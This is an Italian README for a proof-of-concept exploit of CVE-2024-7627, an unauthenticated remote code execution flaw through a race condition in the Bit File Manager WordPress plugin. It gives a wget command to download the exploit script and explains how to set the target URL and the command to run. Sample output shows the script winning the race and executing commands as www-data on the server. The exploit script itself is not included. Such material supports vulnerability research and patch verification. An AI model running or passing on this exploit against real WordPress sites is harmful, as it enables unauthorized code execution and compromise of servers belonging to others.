
Script Proof-of-Concept per il plugin WordPress Bit File Manager versione 6.0 - 6.5.5 Esecuzione remota di codice non autenticata tramite condizione di competizione (vulnerabilità CVE-2024-7627)
Questo script Proof-of-Concept (PoC) riguarda la vulnerabilità di Esecuzione di Codice Remoto non autenticata tramite race condition (CVE-2024-7627) nel plugin WordPress Bit File Manager versioni 6.0 - 6.5.5.
Descrizione:
Il plugin Bit File Manager per WordPress è vulnerabile all'esecuzione di codice remoto nelle versioni da 6.0 a 6.5.5 tramite la funzione 'checkSyntax'. Ciò è dovuto alla scrittura di un file temporaneo in una directory pubblicamente accessibile prima di eseguire la convalida del file. Ciò rende possibile ad attaccanti non autenticati di eseguire codice sul server se un amministratore ha concesso i permessi di lettura all'utente ospite. (Da https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
file-manager deve essere già stato configurato dall'amministratoreAggiorna i parametri targetBaseUrl, fileManagerPostPath e/o commandToExecute nello script Python poc.py con i valori desiderati. Quindi esegui python3 poc.py per lanciare lo script PoC.
Esempio di output:
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6